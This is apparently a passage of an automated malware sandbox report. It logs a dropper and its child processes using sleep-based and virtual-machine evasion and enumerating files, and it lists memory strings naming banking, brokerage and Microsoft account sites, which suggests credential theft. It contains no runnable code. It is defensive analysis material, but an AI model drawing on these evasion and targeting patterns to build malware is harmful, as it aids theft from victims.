Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1684	Thread sleep time: -35556s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1684	Thread sleep time: -46772s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1684	Thread sleep time: -30832s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1684	Thread sleep time: -45363s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1684	Thread sleep time: -53088s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1684	Thread sleep time: -35464s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1684	Thread sleep time: -41232s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1684	Thread sleep time: -59405s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1684	Thread sleep time: -50366s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1684	Thread sleep time: -51335s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1684	Thread sleep time: -45480s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1684	Thread sleep time: -46632s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1684	Thread sleep time: -37200s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1684	Thread sleep time: -51902s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1684	Thread sleep time: -38222s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1684	Thread sleep time: -34816s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1684	Thread sleep time: -36258s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1684	Thread sleep time: -41899s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1684	Thread sleep time: -47601s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1684	Thread sleep time: -46959s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1684	Thread sleep time: -36689s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1684	Thread sleep time: -45122s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1684	Thread sleep time: -44937s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1684	Thread sleep time: -42135s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1684	Thread sleep time: -43310s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1684	Thread sleep time: -54688s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1684	Thread sleep time: -41124s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1684	Thread sleep time: -55746s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1684	Thread sleep time: -36355s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1684	Thread sleep time: -47757s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1684	Thread sleep time: -53143s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1684	Thread sleep time: -45173s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1684	Thread sleep time: -47559s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1684	Thread sleep time: -32552s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1684	Thread sleep time: -55702s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1684	Thread sleep time: -45663s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1684	Thread sleep time: -39868s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1684	Thread sleep time: -44454s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1684	Thread sleep time: -37243s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1684	Thread sleep time: -48690s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1684	Thread sleep time: -44794s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1684	Thread sleep time: -56227s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1684	Thread sleep time: -45479s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1440	Thread sleep count: 839 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6156	Thread sleep time: -1844674407370954s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\i1.exe	File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00405C63 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405C63
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004068B4 FindFirstFileW,FindClose,	0_2_004068B4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00402910 FindFirstFileW,	0_2_00402910
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: 6_2_0041D8B1 FindFirstFileExA,	6_2_0041D8B1
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: 6_2_05CADB18 FindFirstFileExA,	6_2_05CADB18
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_00412570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	8_2_00412570
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_0040D1C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	8_2_0040D1C0
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_004015C0 FindFirstFileA,StrCmpCA,StrCmpCA,LoadLibraryA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	8_2_004015C0
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_00411650 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	8_2_00411650
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_0040B610 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	8_2_0040B610
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_0040DB60 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	8_2_0040DB60
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_00411B80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	8_2_00411B80
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_0040D540 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	8_2_0040D540
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_004121F0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	8_2_004121F0
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	Code function: 11_2_68AE261E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,	11_2_68AE261E

Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe

Code function: 8_2_00401120 GetSystemInfo,ExitProcess,

8_2_00401120

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 60000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 43256
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 59832
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 58541
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 59671
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 59548
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 31714
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 59411
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 59752
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 59264
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 59153
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 35846
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 59023
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 58889
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 30401
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 58778
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 58654
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 58531
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 40036
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 58396
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 48436
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 58266
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 52124
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 58121
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 41734
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 55396
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 56372
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 38538
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 40366
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 39714
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 30047
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 50580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 38703
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 46871
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 31201
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 51362
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 52072
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 41485
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 34179
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 33993
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 42694
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 49103
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 40160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 41544
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 34276
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 46584
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 50598
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 35556
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 46772
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 30832
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 45363
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 53088
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 35464
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 41232
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 59405
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 50366
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 51335
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 45480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 46632
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 37200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 51902
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 38222
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 34816
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 36258
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 41899
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 47601
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 46959
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 36689
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 45122
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 44937
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 42135
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 43310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 54688
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 41124
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 55746
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 36355
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 47757
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 53143
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 45173
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 47559
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 32552
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 55702
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 45663
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 39868
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 44454
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 37243
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 48690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 44794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 56227
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 45479
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\i1.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	File opened: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	File opened: C:\Users\user\AppData\Local\Temp\u2xs.2	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Source: MSBuild.exe, 00000045.00000002.3265540539.0000000003654000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: MSBuild.exe, 00000045.00000002.3265540539.0000000003654000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: i1.exe, 00000006.00000003.2342660108.00000000070C6000.00000004.00000020.00020000.00000000.sdmp, u2xs.3.exe, 0000000F.00000000.2324296887.000000000041C000.00000020.00000001.01000000.00000011.sdmp	Binary or memory string: Datacenter without Hyper-V Core
Source: run.exe, 00000048.00000002.2693112601.000000000335E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: http://www.vmware.com/0
Source: MSBuild.exe, 00000045.00000002.3265540539.0000000003654000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: MSBuild.exe, 00000045.00000002.3279531997.00000000041D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: run.exe, 00000048.00000002.2693112601.000000000335E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.1!0
Source: MSBuild.exe, 00000045.00000002.3279531997.00000000041D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: MSBuild.exe, 00000045.00000002.3279531997.00000000041D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: file.exe, 00000000.00000003.2293457515.00000000006A2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2294911677.00000000006A2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2294644048.0000000000675000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2293457515.0000000000675000.00000004.00000020.00020000.00000000.sdmp, u2xs.0.exe, 00000008.00000002.2984027332.00000000042D4000.00000004.00000020.00020000.00000000.sdmp, u2xs.0.exe, 00000008.00000002.2984027332.000000000427A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.3265620292.00000262C125C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.3260758747.00000262BBC2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.3265336111.00000262C1243000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: run.exe, 00000048.00000002.2693112601.000000000335E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.1
Source: run.exe, 00000048.00000002.2693112601.000000000335E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.0
Source: MSBuild.exe, 00000045.00000002.3279531997.00000000041D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: MSBuild.exe, 00000045.00000002.3265540539.000000000324D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655LR]q`
Source: u2xs.3.exe, 0000000F.00000000.2324296887.000000000041C000.00000020.00000001.01000000.00000011.sdmp	Binary or memory string: VMWARE_VIRTUAL
Source: MSBuild.exe, 00000045.00000002.3265540539.0000000003654000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: MSBuild.exe, 00000045.00000002.3265540539.0000000003654000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: MSBuild.exe, 00000045.00000002.3279531997.00000000041D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: MSBuild.exe, 00000045.00000002.3265540539.0000000003654000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: MSBuild.exe, 00000045.00000002.3265540539.0000000003654000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: MSBuild.exe, 00000045.00000002.3279531997.00000000041D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: powershell.exe, 00000007.00000002.2129875387.00000000075A6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll:
Source: MSBuild.exe, 00000045.00000002.3279531997.00000000041D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: run.exe, 00000048.00000002.2693112601.000000000335E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: noreply@vmware.com0
Source: MSBuild.exe, 00000045.00000002.3279531997.00000000041D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: MSBuild.exe, 00000045.00000002.3279531997.00000000041D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: MSBuild.exe, 00000045.00000002.3265540539.0000000003654000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: MSBuild.exe, 00000045.00000002.3279531997.00000000041D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: u2xs.0.exe, 00000008.00000002.2984027332.000000000427A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: MSBuild.exe, 00000045.00000002.3279531997.00000000041D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: MSBuild.exe, 00000045.00000002.3265540539.0000000003654000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: MSBuild.exe, 00000045.00000002.3265540539.0000000003654000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: MSBuild.exe, 00000045.00000002.3279531997.00000000041D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: i1.exe, 00000006.00000003.2342660108.00000000070C6000.00000004.00000020.00020000.00000000.sdmp, u2xs.3.exe, 0000000F.00000000.2324296887.000000000041C000.00000020.00000001.01000000.00000011.sdmp	Binary or memory string: Datacenter without Hyper-V Full
Source: i1.exe, 00000006.00000003.2342660108.00000000070C6000.00000004.00000020.00020000.00000000.sdmp, u2xs.3.exe, 0000000F.00000000.2324296887.000000000041C000.00000020.00000001.01000000.00000011.sdmp	Binary or memory string: Enterprise without Hyper-V Full
Source: MSBuild.exe, 00000045.00000002.3265540539.0000000003654000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
